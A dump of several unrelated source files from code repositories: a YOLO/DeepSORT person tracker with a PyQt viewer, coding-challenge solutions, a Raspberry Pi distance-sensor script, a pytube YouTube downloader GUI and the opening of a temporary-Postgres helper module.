bboxes = utils.format_boxes(bboxes, original_h, original_w)
# store all predictions in one parameter for simplicity when calling functions
pred_bbox = [bboxes, scores, classes, num_objects]
# read in all class names from config
class_names = utils.read_class_names(cfg.YOLO.CLASSES)
# by default allow all classes in .names file
# allowed_classes = list(class_names.values())
# custom allowed classes (uncomment line below to customize tracker for only people)
allowed_classes = ['person']
# loop through objects and use class index to get class name, allow only classes in allowed_classes list
names = []
deleted_indx = []
for i in range(num_objects):
class_indx = int(classes[i])
class_name = class_names[class_indx]
if class_name not in allowed_classes:
deleted_indx.append(i)
else:
names.append(class_name)
names = np.array(names)
count = len(names)
if count:
cv2.putText(frame_data, "Objects being tracked: {}".format(count), (5, 35), cv2.FONT_HERSHEY_COMPLEX_SMALL,
2,(0, 255, 0), 2)
# print("Objects being tracked: {}".format(count))
# delete detections that are not in allowed_classes
bboxes = np.delete(bboxes, deleted_indx, axis=0)
scores = np.delete(scores, deleted_indx, axis=0)
# encode yolo detections and feed to tracker
features = self.encoder(frame_data, bboxes)
detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in
zip(bboxes, scores, names, features)]
# initialize color map
cmap = plt.get_cmap('tab20b')
colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
# run non-maxima supression
boxs = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
classes = np.array([d.class_name for d in detections])
indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# DeepSort Tracking Start
# Call the tracker
self.tracker.predict() # load tracker
self.tracker.update(detections)
#check is_confirmed
is_not_confirmed = 0
tracks_count = 0
for w, track in enumerate(self.tracker.tracks):
tracks_count += 1
# print('count', tracks_count)
# update tracks
for index, track in enumerate(self.tracker.tracks):
if not track.is_confirmed() or track.time_since_update > 1:
is_not_confirmed += 1
continue
if index-is_not_confirmed+1 > people_num:
break
bbox = track.to_tlbr()
class_name = track.get_class()
# draw bbox on screen (this processing should be finished before the frame is sent on)
for i in range(self.indexing.qsize()):
check_index = self.indexing.get()
if track.track_id == check_index:
color = colors[int(track.track_id)*8 % len(colors)]
color = [j * 255 for j in color]
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1] - 30)),
(int(bbox[0]) + (len(class_name) + len(str(track.track_id))) * 17, int(bbox[1])),
color, -1)
cv2.putText(frame_data, class_name + "-" + str(track.track_id),
(int(bbox[0]), int(bbox[1] - 10)), 0, 0.75,
(255, 255, 255), 2)
break
else:
self.indexing.put(check_index)
if i == self.indexing.qsize() - 1:
cng_index = self.indexing.get()
print('index changed', track.track_id, '->', cng_index)
# track.track_id = cng_index
color = colors[int(cng_index)*8 % len(colors)]
color = [j * 255 for j in color]
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1] - 30)),
(int(bbox[0]) + (len(class_name) + len(str(cng_index))) * 17, int(bbox[1])),
color, -1)
cv2.putText(frame_data, class_name + "-" + str(cng_index),
(int(bbox[0]), int(bbox[1] - 10)), 0, 0.75,
(255, 255, 255), 2)
# if enable info flag then print details about each track
if info:
print("Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}".format(str(track.track_id),
class_name, (
int(bbox[0]),
int(bbox[1]),
int(bbox[2]),
int(bbox[3]))))
# calculate frames per second of running detections
fps = 1.0 / (time.time() - start_time)
# print("FPS: %.2f" % fps)
result = cv2.cvtColor(frame_data, cv2.COLOR_RGB2BGR)
return result
```
#### File: Johyeonje/TrackPerformerAlgorism/Prototype_size_regulation.py
```python
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, kurokesu.com"
__version__ = "0.1"
__license__ = "GPL"
import tensorflow as tf
from deep_sort import nn_matching
from CoreTech import Apply_Models
from deep_sort.tracker import Tracker
import time
import queue
import sys
import threading
import cv2
from PyQt5 import uic
from PyQt5.QtCore import Qt, QUrl, QSize, QPoint, QTimer
from PyQt5.QtGui import QIcon, QFont, QPainter, QImage
from PyQt5.QtWidgets import (QApplication, QFileDialog, QHBoxLayout, QPushButton, QSlider, QStyle, QVBoxLayout, QWidget,
QStatusBar, QMainWindow,
QAction, qApp)
from tensorflow.python.saved_model import tag_constants
running = False
capture_thread = None
form_class = uic.loadUiType("simple.ui")[0]
q = queue.Queue()
def grab(cam, queue, width, height, fps):
global running
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
capture.set(cv2.CAP_PROP_FPS, fps)
apply = Apply_Models()
while running:
start_time = time.time()
frame = {}
capture.grab()
retval, img = capture.retrieve(0)
img[:87, :] = 0
img = apply.main(img)
frame["img"] = img
fps = 1.0 / (time.time() - start_time)
print("FPS : %.3f"%(fps))
if queue.qsize() < 10:
queue.put(frame)
else:
print(queue.qsize())
class OwnImageWidget(QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):  # note (translated from Korean): applying YOLOv4 to this code should work
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QPoint(0, 0), self.image)
qp.end()
class MyWindowClass(QMainWindow, form_class):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.setupUi(self)
self.initUI()
self.startButton.clicked.connect(self.start_clicked)
self.window_width = self.ImgWidget.frameSize().width()
self.window_height = self.ImgWidget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.ImgWidget)
self.timer = QTimer(self)
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def initUI(self):
camAction = QAction('Use Cam', self)
camAction.setShortcut('Ctrl+C')
camAction.setStatusTip('Use Cam')
camAction.triggered.connect(self.start_clicked)
exitAction = QAction('Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(qApp.quit)
self.statusBar()
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
filemenu = menubar.addMenu('&File')
filemenu.addAction(camAction)
filemenu.addAction(exitAction)
def start_clicked(self):
global running
running = True
capture_thread.start()
self.startButton.setEnabled(False)
self.startButton.setText('Starting...')
def update_frame(self):
if not q.empty():
self.startButton.setText('Camera is live')
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QImage(img.data, width, height, bpl, QImage.Format_RGB888)
self.ImgWidget.setImage(image)
def closeEvent(self, event):
global running
running = False
capture_thread = threading.Thread(target=grab, args=('./data/video/tttt1.mp4', q, 1920, 1080, 30))
if __name__ == '__main__':
app = QApplication(sys.argv)
w = MyWindowClass(None)
w.setWindowTitle('Kurokesu PyQT OpenCV USB camera test panel')
w.show()
app.exec_()
```
#### File: Johyeonje/TrackPerformerAlgorism/TPD_evaluate.py
```python
import numpy as np
import pandas as pd
def evaluate_TPD(path):
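# Assumed sheet layout: one row per frame and one column per ground-truth object, each cell
# holding the track id assigned to that object (0 meaning not detected). A frame's TPD is the
# fraction of detected objects that kept their expected id; the score is averaged over frames.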
xlsx = pd.read_excel(path, header=None)
score = 0.
frame_size = xlsx.shape[0]
print(frame_size)
for t in range(frame_size):
det_obj = xlsx.shape[1]
trac_obj = xlsx.shape[1]
for n in range(1, xlsx.shape[1]+1):
if n != int(xlsx.iloc[t, n-1]):
if xlsx.iloc[t, n-1] == 0:
det_obj -= 1
trac_obj -= 1
else:
trac_obj -= 1
tpd = trac_obj / det_obj
score += tpd
print('TPD :%.9f'%(score/frame_size))
if __name__ == "__main__":
path = 'C:/Users/์ด์นํ/Desktop/GIT/TrackPerformerAlgorism/excel/test1_our_deepsort_labels.xlsx'
print(path.split('/')[1], 'files operation..')
evaluate_TPD(path)
``` |
{
"source": "JoHyukJun/algorithm-analysis",
"score": 4
} |
#### File: source/python/4Sum.py
```python
from typing import List
class Solution:
def fourSum(self, nums: List[int], target: int) -> List[List[int]]:
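# Sort the array, fix the first two numbers, then close in on the remaining pair with two
# pointers; a set of tuples filters out duplicate quadruplets.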
output = []
alpha_basis = 0
beta_basis = 0
head = 0
tail = 0
temp_set = set()
ckr = 0
if (len(nums) < 4):
return output
nums.sort()
for alpha_basis in range (len(nums) - 2):
for beta_basis in range(alpha_basis + 1, len(nums)):
head = beta_basis + 1
tail = len(nums) - 1
ckr = target - nums[alpha_basis] - nums[beta_basis]
while head < tail:
if (ckr == nums[head] + nums[tail]):
temp_set.add((nums[alpha_basis],
nums[beta_basis],
nums[head],
nums[tail]))
head += 1
tail -= 1
elif ckr < nums[head] + nums[tail]:
tail -= 1
else:
head += 1
output = list(temp_set)
return output
```
#### File: source/python/ArrayPartition1.py
```python
from typing import List
class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
return sum(sorted(nums)[::2])
```
#### File: source/python/AvodingSameNumber.py
```python
def solution(arr):
answer = []
answer.append(arr[0])
for i in range(1, len(arr)):
if (arr[i] == arr[i - 1]):
continue
else:
answer.append(arr[i])
return answer
```
#### File: source/python/BestTimeToBuyAndSAellStock.py
```python
import sys
from typing import List
class Solution:
def maxProfit(self, prices: List[int]) -> int:
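# Single pass: track the lowest price seen so far and the best profit from selling at the current price.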
output = 0
m_price = sys.maxsize
for p in prices:
m_price = min(p, m_price)
output = max(output, p - m_price)
return output
```
#### File: source/python/BreakWall.py
```python
import sys
from collections import deque
def bfs(in_x, in_y, in_z):
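# BFS state is (x, y, z): z == 1 means the single allowed wall break is still available,
# z == 0 means it has been used; visited distances are stored per z layer.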
queue = deque([(in_x, in_y, in_z)])
while queue:
x, y, z = queue.popleft()
if x == n - 1 and y == m - 1:
return visited[x][y][z]
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if nx >= 0 and ny >= 0 and nx < n and ny < m:
if arr[nx][ny] == 1 and z == 1:
visited[nx][ny][z - 1] = visited[x][y][z] + 1
queue.append((nx, ny, z - 1))
elif arr[nx][ny] == 0 and visited[nx][ny][z] == 0:
visited[nx][ny][z] = visited[x][y][z] + 1
queue.append((nx, ny, z))
return -1
n, m = map(int, sys.stdin.readline().rstrip().split(' '))
arr = []
answer = []
for _ in range(n):
arr.append(list(map(int, sys.stdin.readline().rstrip())))
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
visited = [[[0] * 2 for _ in range(m)] for _ in range(n)]
visited[0][0][1] = 1
print(bfs(0, 0, 1))
```
#### File: source/python/Ending.py
```python
def solution(n, words):
answer = []
ckr = []
ckr.append(words[0])
for i in range(1, len(words)):
user = i % n
num = i // n
if words[i][0] != words[i - 1][-1]:
answer.append(user + 1)
answer.append(num + 1)
return answer
if words[i] in ckr:
answer.append(user + 1)
answer.append(num + 1)
return answer
else:
ckr.append(words[i])
answer.append(0)
answer.append(0)
return answer
```
#### File: source/python/FibonacciFunction.py
```python
t = int(input())
dp = [(0, 0) for _ in range(41)]
dp[0] = (1, 0)
dp[1] = (0, 1)
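# dp[i] = (number of times fib(0) is reached, number of times fib(1) is reached) when fib(i) is evaluated recursively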
def fiv_counter():
global dp
for i in range(2, 41):
dp[i] = (dp[i - 1][0] + dp[i - 2][0], dp[i - 1][1] + dp[i - 2][1])
fiv_counter()
for _ in range(t):
n = int(input())
print(dp[n][0], dp[n][1])
```
#### File: source/python/LongestPalindromicSubstring.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
output = ''
cnt = 0
if len(s) == 0:
return output
for idx in range(0, len(s)):
for iidx in range(idx + len(output), len(s) + 1):
forward = s[idx:iidx]
backward = forward[::-1]
if forward == backward:
temp = forward
if len(temp) > len(output):
output = temp
return output
```
#### File: source/python/LSWRC.py
```python
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
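# Sliding window kept as a list: on a repeated character, drop everything up to and including
# its previous occurrence, then record the longest window seen so far.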
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
```
#### File: source/python/MonkeyWantingToBeAHorse.py
```python
import sys
from collections import deque
def bfs():
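# BFS state is (x, y, z): z counts how many of the k horse (knight) jumps have been used so far.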
queue = deque([(0, 0, 0)])
while queue:
x, y, z = queue.popleft()
if x == h - 1 and y == w - 1:
return visited[x][y][z] - 1
# monkey move
for i in range(4):
nx = x + mm[i][0]
ny = y + mm[i][1]
if nx >= 0 and ny >= 0 and nx < h and ny < w and not visited[nx][ny][z] and arr[nx][ny] == 0:
queue.append((nx, ny, z))
visited[nx][ny][z] = visited[x][y][z] + 1
# horse move
if z < k:
for i in range(8):
nx = x + hm[i][0]
ny = y + hm[i][1]
if nx >= 0 and ny >= 0 and nx < h and ny < w and not visited[nx][ny][z + 1] and arr[nx][ny] == 0:
queue.append((nx, ny, z + 1))
visited[nx][ny][z + 1] = visited[x][y][z] + 1
return -1
k = int(sys.stdin.readline())
w, h = map(int, sys.stdin.readline().rstrip().split(' '))
arr = []
for _ in range(h):
arr.append(list(map(int, sys.stdin.readline().rstrip().split(' '))))
visited = [[[0 for _ in range(k + 1)] for _ in range(w)] for _ in range(h)]
visited[0][0][0] = 1
mm = [(-1, 0), (1, 0), (0, 1), (0, -1)]
hm = [(-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, -2), (2, -1), (2, 1), (1, 2)]
print(bfs())
```
#### File: source/python/PermutationCycle.py
```python
import sys
def dfs(idx):
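# Follow the permutation from idx until an already-visited element is reached;
# each top-level dfs call from the main loop therefore covers exactly one cycle.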
visited[idx] = 1
next_idx = arr[idx]
if not visited[next_idx]:
dfs(next_idx)
t = int(sys.stdin.readline())
for _ in range(t):
n = int(sys.stdin.readline())
arr = [0] + list(map(int, sys.stdin.readline().rstrip().split(' ')))
visited = [0 for _ in range(n + 1)]
visited[0] = 1
answer = 0
for i in range(1, n + 1):
if not visited[i]:
dfs(i)
answer += 1
print(answer)
```
#### File: source/python/SkillTree.py
```python
def solution(skill, skill_trees):
answer = 0
skill_stack = list(skill)
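# A skill tree counts only if the required skills appear in it in the same order as `skill`,
# i.e. the collected skills must always form a prefix of skill_stack.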
for v in skill_trees:
tmp = []
is_ok = True
cur_skill = list(v)
for i in range(len(cur_skill)):
if cur_skill[i] in skill_stack:
tmp.append(cur_skill[i])
if tmp != skill_stack[:len(tmp)]:
is_ok = False
break
if is_ok:
answer += 1
return answer
```
#### File: source/python/ValidPalindrome.py
```python
import collections
from typing import Deque
class Solution:
def valid_palindrome(self, s: str) -> bool:
output = True
ckr: Deque = collections.deque()
for c in s:
if c.isalpha() or c.isdigit():
ckr.append(c.lower())
while len(ckr) > 1:
if ckr.pop() == ckr.popleft():
continue
else:
output = False
return output
return output
``` |
{
"source": "JoHyukJun/RasberryPiLab",
"score": 3
} |
#### File: doodle/test03/testcode04.py
```python
import RPi.GPIO as GPIO
import time
usleep = lambda x : time.sleep(x / 1000000.0)
import datetime as dt
TP = 4
EP = 17
def getDistance():
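# Assumed HC-SR04 style sensor: send a 10 us trigger pulse, time how long the echo pin stays
# high, then convert the round-trip time in microseconds to centimetres (~29 us per cm, halved).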
fDistance = 0.0
nStartTime, nEndTime = 0, 0
GPIO.output(TP, GPIO.LOW)
usleep(2)
GPIO.output(TP, GPIO.HIGH)
usleep(10)
GPIO.output(TP, GPIO.LOW)
while(GPIO.input(EP) == GPIO.LOW):
pass
nStartTime = dt.datetime.now()
while(GPIO.input(EP) == GPIO.HIGH):
pass
nEndTime = dt.datetime.now()
fDistance = (nEndTime - nStartTime).microseconds / 29. / 2.
return fDistance
GPIO.setmode(GPIO.BCM)
GPIO.setup(TP, GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(EP, GPIO.IN)
time.sleep(0.5)
while(1):
fDistance = getDistance()
print(fDistance)
time.sleep(1)
``` |
{
"source": "JoHyukJun/youtube-downloader",
"score": 3
} |
#### File: youtube-downloader/source/main.py
```python
import os
from pathlib import Path
from tkinter import *
from tkinter import ttk
from tkinter import font
from pytube import YouTube
BASE_DIR = Path(__file__).resolve(strict=True).parent
class Application(Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.window_settings()
self.grid()
self.create_widgets()
def create_widgets(self):
jFont = font.Font(family="Malgun Gothic", size=12)
self.url_input_lable = Label(self, text="Enter the YouTube URL.", font=jFont, width=40)
self.url_input_entry = Entry(self, font=jFont, width=40)
self.video_list = Listbox(self, font=jFont, width=40)
self.lookup_button = Button(self, text="Lookup", font=jFont, command=lambda:self.button_cmd('lookup', self.url_input_entry.get()))
self.download_button = Button(self, text="Download", font=jFont, command=lambda:self.button_cmd('download', self.url_input_entry.get()))
self.download_prg_bar = ttk.Progressbar(self, length=400, mode='determinate')
'''
layout settings
'''
self.url_input_lable.grid(row=0, padx=2, pady=2)
self.url_input_entry.grid(row=1, column=0, padx=2, pady=2)
self.video_list.grid(row=1, column=1, padx=2, pady=2)
self.download_button.grid(row=2, column=0, padx=2, pady=2)
self.lookup_button.grid(row=2, column=1, padx=2, pady=2)
self.download_prg_bar.grid(row=3, padx=2, pady=2)
return
def window_settings(self):
self.master.title("Youtube Downloader")
self.master.geometry("800x400+0+0")
self.master.iconbitmap(BASE_DIR / 'static/images/unluckystrike_logo_clear.ico')
return
def button_cmd(self, value, url):
yt = YouTube(url, on_progress_callback=self.progressbar_cmd)
if value == 'download':
selection = self.video_list.get(self.video_list.curselection())
selection = selection.split(' ')
print(selection)
pre_itag = selection[1].split('=')
pre_itag = pre_itag[1].split('"')
itag = int(pre_itag[1])
print(itag)
#d_stream = yt.streams.first()
d_stream = yt.streams.get_by_itag(itag)
d_stream.download(BASE_DIR / 'download')
elif value == 'lookup':
l_stream = yt.streams
# video list box init
self.video_list.delete(0, END)
for idx, stream in enumerate(l_stream.all()):
self.video_list.insert(END, str(stream))
self.video_list.update()
else:
return
return
def progressbar_cmd(self, stream, chunk, bytes_remaining):
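# pytube on_progress callback: turn the remaining bytes into a completed percentage and push it to the progress bar.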
size = stream.filesize
progress = (float(abs(bytes_remaining - size) / size)) * float(100)
self.download_prg_bar['value'] = progress
self.download_prg_bar.update()
return
def main():
root = Tk()
app = Application(master=root)
app.mainloop()
if __name__ == '__main__':
main()
``` |
{
"source": "johyy/lukuvinkkikirjasto",
"score": 4
} |
#### File: src/entities/user.py
```python
class UserAccount():
""" Class that represents a single user. """
def __init__(self, username, password):
""" Class constructor. Creates a new user.
Attributes:
_username: [String] Unique identifier of the user.
_password: [String] Password of the user profile.
"""
self._username = username
self._password = password
self._recommendations = []
self._admin = False
def get_username(self):
""" Gets the name of the user."""
return self._username
def get_password(self):
""" Gets the password of the user."""
return self._password
def set_username(self, username):
""" Sets username.
Args:
username: [String] The username to be set.
"""
self._username = username
def set_password(self, password):
""" Sets user's password.
Args:
password: [String] The password to be set.
"""
self._password = password
def set_admin(self, boolean):
""" Sets user's admin status.
Args:
admin: [boolean] The admin status to be set.
"""
self._admin = boolean
def add_recommendation(self, recommendation):
""" Adds a recommendation to the user."""
self._recommendations.append(recommendation)
def remove_recommendation(self, recommendation):
""" Removes a recommendation to the user."""
if recommendation in self._recommendations:
self._recommendations.remove(recommendation)
def get_recommendations(self):
""" Returns user's recommendations."""
return self._recommendations
def is_admin(self):
return self._admin
```
#### File: src/repositories/user_repository.py
```python
from db import db
class UserRepository:
"""Class that handles database queries for users"""
def __init__(self):
"""Class constructor"""
def add_a_new_user(self, user):
"""Adds a new user"""
try:
sql = "INSERT INTO users (username, password, admin) VALUES (:username, :password, :admin)"
db.session.execute(sql, {"username": user.get_username(
), "password": user.get_password(), "admin": user.is_admin()})
db.session.commit()
return True
except Exception as exception:
print(exception)
return False
def get_user(self, username):
"""Returns user"""
sql = "SELECT username, password, admin, rowid FROM users WHERE username=:username"
result = db.session.execute(sql, {"username": username})
user = result.fetchone()
if not user:
return False
return user
def get_user_by_id(self, user_id):
"""Returns user"""
sql = "SELECT username, password, admin, rowid FROM users WHERE rowid=:rowid"
result = db.session.execute(sql, {"rowid": user_id})
user = result.fetchone()
if not user:
return False
return user
def delete_all(self):
sql = """DELETE FROM users"""
db.session.execute(sql)
db.session.commit()
user_repository = UserRepository()
``` |
{
"source": "JoiceV/Detecta-a-posi-o-sentada-de-uma-pessoa",
"score": 2
} |
#### File: JoiceV/Detecta-a-posi-o-sentada-de-uma-pessoa/posture_image.py
```python
import cv2
import math
import time
import numpy as np
import util
from config_reader import config_reader
from scipy.ndimage.filters import gaussian_filter
from model import get_testing_model
tic=0
# visualize
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
[0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
[85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]
def process (input_image, params, model_params):
''' Start of finding the Key points of full body using Open Pose.'''
oriImg = cv2.imread(input_image) # B,G,R order
multiplier = [x * model_params['boxsize'] / oriImg.shape[0] for x in params['scale_search']]
heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))
paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))
for m in range(1):
scale = multiplier[m]
imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
imageToTest_padded, pad = util.padRightDownCorner(imageToTest, model_params['stride'],
model_params['padValue'])
input_img = np.transpose(np.float32(imageToTest_padded[:,:,:,np.newaxis]), (3,0,1,2)) # required shape (1, width, height, channels)
output_blobs = model.predict(input_img)
heatmap = np.squeeze(output_blobs[1]) # output 1 is heatmaps
heatmap = cv2.resize(heatmap, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3],
:]
heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
paf = np.squeeze(output_blobs[0]) # output 0 is PAFs
paf = cv2.resize(paf, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
heatmap_avg = heatmap_avg + heatmap / len(multiplier)
paf_avg = paf_avg + paf / len(multiplier)
all_peaks = [] #To store all the key points which a re detected.
peak_counter = 0
prinfTick(1) #prints time required till now.
for part in range(18):
map_ori = heatmap_avg[:, :, part]
map = gaussian_filter(map_ori, sigma=3)
map_left = np.zeros(map.shape)
map_left[1:, :] = map[:-1, :]
map_right = np.zeros(map.shape)
map_right[:-1, :] = map[1:, :]
map_up = np.zeros(map.shape)
map_up[:, 1:] = map[:, :-1]
map_down = np.zeros(map.shape)
map_down[:, :-1] = map[:, 1:]
peaks_binary = np.logical_and.reduce(
(map >= map_left, map >= map_right, map >= map_up, map >= map_down, map > params['thre1']))
peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse
peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
id = range(peak_counter, peak_counter + len(peaks))
peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]
all_peaks.append(peaks_with_score_and_id)
peak_counter += len(peaks)
connection_all = []
special_k = []
mid_num = 10
prinfTick(2) #prints time required till now.
print()
position = checkPosition(all_peaks) #check position of spine.
checkKneeling(all_peaks) #check whether kneeling or not
checkHandFold(all_peaks) #check whether hands are folding or not.
canvas1 = draw(input_image,all_peaks) #show the image.
return canvas1 , position
def draw(input_image, all_peaks):
canvas = cv2.imread(input_image) # B,G,R order
for i in range(18):
for j in range(len(all_peaks[i])):
cv2.circle(canvas, all_peaks[i][j][0:2], 4, colors[i], thickness=-1)
return canvas
def checkPosition(all_peaks):
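# Estimate spine lean from the ear-to-hip angle: returns 1 (leaning forward / hunchback),
# -1 (reclined) or 0 (roughly straight), matching the labels printed in __main__.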
try:
f = 0
if (all_peaks[16]):
a = all_peaks[16][0][0:2] #Right Ear
f = 1
else:
a = all_peaks[17][0][0:2] #Left Ear
b = all_peaks[11][0][0:2] # Hip
angle = calcAngle(a,b)
degrees = round(math.degrees(angle))
if (f):
degrees = 180 - degrees
if (degrees<70):
return 1
elif (degrees > 110):
return -1
else:
return 0
except Exception as e:
print("person not in lateral view and unable to detect ears or hip")
#calculate angle between two points with respect to x-axis (horizontal axis)
def calcAngle(a, b):
try:
ax, ay = a
bx, by = b
if (ax == bx):
return 1.570796
return math.atan2(by-ay, bx-ax)
except Exception as e:
print("unable to calculate angle")
def checkHandFold(all_peaks):
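# Heuristic: if the elbow-to-wrist distance deviates from the shoulder-to-elbow distance by
# more than ~100 px (forearm foreshortened), the hands are assumed to be folded.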
try:
if (all_peaks[3][0][0:2]):
try:
if (all_peaks[4][0][0:2]):
distance = calcDistance(all_peaks[3][0][0:2],all_peaks[4][0][0:2]) #distance between right arm-joint and right palm.
armdist = calcDistance(all_peaks[2][0][0:2], all_peaks[3][0][0:2]) #distance between left arm-joint and left palm.
if (distance < (armdist + 100) and distance > (armdist - 100) ): #this value 100 is arbitrary; it should be replaced with a calculation that can adjust to different sizes of people.
print("Not Folding Hands")
else:
print("Folding Hands")
except Exception as e:
print("Folding Hands")
except Exception as e:
try:
if(all_peaks[7][0][0:2]):
distance = calcDistance( all_peaks[6][0][0:2] ,all_peaks[7][0][0:2])
armdist = calcDistance(all_peaks[6][0][0:2], all_peaks[5][0][0:2])
# print(distance)
if (distance < (armdist + 100) and distance > (armdist - 100)):
print("Not Folding Hands")
else:
print("Folding Hands")
except Exception as e:
print("Unable to detect arm joints")
def calcDistance(a,b): #calculate distance between two points.
try:
x1, y1 = a
x2, y2 = b
return math.hypot(x2 - x1, y2 - y1)
except Exception as e:
print("unable to calculate distance")
def checkKneeling(all_peaks):
f = 0
if (all_peaks[16]):
f = 1
try:
if(all_peaks[10][0][0:2] and all_peaks[13][0][0:2]): # if both legs are detected
rightankle = all_peaks[10][0][0:2]
leftankle = all_peaks[13][0][0:2]
hip = all_peaks[11][0][0:2]
leftangle = calcAngle(hip,leftankle)
leftdegrees = round(math.degrees(leftangle))
rightangle = calcAngle(hip,rightankle)
rightdegrees = round(math.degrees(rightangle))
if (f == 0):
leftdegrees = 180 - leftdegrees
rightdegrees = 180 - rightdegrees
if (leftdegrees > 60 and rightdegrees > 60): # 60 degrees is a trial-and-error value here. We can tweak this accordingly and results will vary.
print ("Both Legs are in Kneeling")
elif (rightdegrees > 60):
print ("Right leg is kneeling")
elif (leftdegrees > 60):
print ("Left leg is kneeling")
else:
print ("Not kneeling")
except IndexError as e:
try:
if (f):
a = all_peaks[10][0][0:2] # if only one leg (right leg) is detected
else:
a = all_peaks[13][0][0:2] # if only one leg (left leg) is detected
b = all_peaks[11][0][0:2] #location of hip
angle = calcAngle(b,a)
degrees = round(math.degrees(angle))
if (f == 0):
degrees = 180 - degrees
if (degrees > 60):
print ("Both Legs Kneeling")
else:
print("Not Kneeling")
except Exception as e:
print("legs not detected")
def showimage(img): #sometimes opencv will oversize the image when using `cv2.imshow()`. This function solves that issue.
screen_res = 1280, 720 #my screen resolution.
scale_width = screen_res[0] / img.shape[1]
scale_height = screen_res[1] / img.shape[0]
scale = min(scale_width, scale_height)
window_width = int(img.shape[1] * scale)
window_height = int(img.shape[0] * scale)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', window_width, window_height)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
def prinfTick(i): #Time calculation to keep track of progress
toc = time.time()
print ('processing time%d is %.5f' % (i,toc - tic))
if __name__ == '__main__': #main function of the program
tic = time.time()
print('start processing...')
model = get_testing_model()
model.load_weights('./model/keras/model.h5')
vi=False
if(vi == False):
time.sleep(2)
params, model_params = config_reader()
canvas, position= process('./sample_images/straight_flip.jpg', params, model_params)
showimage(canvas)
if (position == 1):
print("Hunchback")
elif (position == -1):
print ("Reclined")
else:
print("Straight")
``` |
{
"source": "joichirou/progressbar",
"score": 3
} |
#### File: progressbar/progressbar/drawConsole.py
```python
import datetime
import sys
class DrawConsole:
def __init__(self):
self.bar = ""
self.bar_tip = ""
self.finish_message = ""
def update(self, model):
u"""drawing progress bar
model: observer class
"""
bar_length = self.get_bar_length(model.value)
sys.stdout.flush()
sys.stdout.write(
"\r[%s%%]%s%s" %
(model.value,
(self.bar * int(bar_length)),
self.bar_tip))
if (model.value >= 100):
print("\n%s" % self.finish_message)
def get_bar_length(self, value):
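# Map a 0-100 percentage onto 1-20 bar segments (one segment per 5%), clamped at both ends.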
bar_length = (value / 5)
if (bar_length == 0):
return 1
if (bar_length <= 20):
return bar_length
else:
return 20
``` |
{
"source": "joidegn/pg_temp",
"score": 3
} |
#### File: pg_temp/pg_temp/pg_temp.py
```python
import itertools
import os
import sys
import atexit
import shutil
import subprocess
import tempfile
import time
import pwd
from contextlib import contextmanager
import shlex
import warnings
# Module level TempDB singleton
temp_db = None
# Module constants
DEFAULT_DOCKER_EXE = 'docker'
DOCKER_INTERNAL_SOCK_DIR = '/var/run/postgresql'
